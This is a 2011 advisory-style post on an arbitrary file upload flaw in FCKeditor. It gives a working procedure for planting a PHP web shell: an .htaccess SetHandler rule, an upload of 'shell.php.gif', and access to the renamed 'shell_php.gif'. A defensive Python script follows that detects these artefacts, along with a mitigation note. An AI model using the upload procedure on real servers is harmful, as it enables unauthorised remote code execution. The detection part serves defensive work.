FCKeditor Upload Vulnerability (All PHP Versions)
Author: Anonymous  Source: compiled by this site  Published: 2011-10-25 7:39:07
[+] Title: FCKeditor all version Arbitrary File Upload Vulnerability
[+] Date: 2011
[+] Author : sinesafe.cn
[+] Website : WwW.sinesafe.cn
———————————————————
1. Create an htaccess file:
code:
<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch>

2. Now upload this htaccess with FCKeditor.

http://www.sinesafe.cn/FCKeditor ... er/upload/test.html

http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
———————————————————————————————-
3. Now upload shell.php.gif with FCKeditor.
4. After uploading shell.php.gif, the name “shell.php.gif” changes to “shell_php.gif” automatically.
5. http://www.sinesafe.cn/anything/shell_php.gif
6. Now the shell is available from the server.
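
For defenders, the two artefacts this procedure leaves in an upload tree (an uploaded .htaccess that remaps a handler, and a file renamed to *_php.<ext>) can be searched for directly. The following is an added example, not code from the original post or from FCKeditor; the function names, the regular expressions and the sample directory layout are assumptions made for illustration.

```python
import os
import re
import tempfile

# Directives that let a per-directory .htaccess change how Apache handles a file.
HANDLER_RE = re.compile(r"^\s*(SetHandler|AddHandler|AddType|ForceType)\b.*php", re.I)
# Name left behind when "shell.php.gif" is rewritten to "shell_php.gif".
RENAMED_RE = re.compile(r"_(php\d?|phtml)\.[A-Za-z0-9]+$", re.I)


def audit_upload_dir(root):
    """Return sorted (kind, relative_path, detail) findings under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            if name.lower() == ".htaccess":
                with open(path, "r", errors="replace") as fh:
                    for lineno, line in enumerate(fh, 1):
                        if HANDLER_RE.search(line):
                            detail = f"line {lineno}: {line.strip()}"
                            findings.append(("htaccess-handler", rel, detail))
            elif RENAMED_RE.search(name):
                findings.append(("renamed-script", rel, name))
    return sorted(findings)


def build_sample_tree(root):
    """Constructed sample data: one clean folder, one holding both artefacts."""
    os.makedirs(os.path.join(root, "image"))
    os.makedirs(os.path.join(root, "file"))
    with open(os.path.join(root, "image", "logo.gif"), "wb") as fh:
        fh.write(b"GIF89a")
    with open(os.path.join(root, "file", ".htaccess"), "w") as fh:
        fh.write('<FilesMatch "_php.gif">\n'
                 'SetHandler application/x-httpd-php\n'
                 '</FilesMatch>\n')
    with open(os.path.join(root, "file", "shell_php.gif"), "wb") as fh:
        fh.write(b"GIF89a")


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        for kind, rel, detail in audit_upload_dir(tmp):
            print(f"{kind:18} {rel}  ({detail})")
```

If the upload directory is served with AllowOverride None, Apache ignores an uploaded .htaccess, so the SetHandler line from step 1 has no effect.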